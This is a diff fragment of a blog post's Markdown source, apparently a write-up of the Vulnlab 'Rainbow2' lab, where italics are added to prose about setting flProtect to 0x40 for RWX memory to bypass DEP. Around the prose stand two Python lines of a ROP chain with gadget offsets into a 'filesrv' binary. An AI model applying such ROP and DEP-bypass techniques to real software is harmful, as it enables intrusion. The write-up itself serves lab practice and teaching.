dplastico/dplastico.github.io/_posts/2023-07-02-2023-write_up-Rainbow2-(Vulnlab).md

 rop += p32(filesrv+0x0000582b) # inc ecx; ret 0;
 ```

-The argument left to set in the stub is flProtect, which needs to be 0x40 in order to set the permissions of the memory we are allocating as RWX, and this way bypasses the _DEP_ protection.
-Let's use one more time the negate trick to accomplish this.
+The argument left to set in the stub is _flProtect_, which needs to be 0x40 in order to set the permissions of the memory we are allocating as _RWX_, and this way bypasses the _DEP_ protection.
+Let's use one more time the _negate_ trick to accomplish this.

 ```python
 rop += p32(filesrv+0x0004cbfb) #pop eax; ret;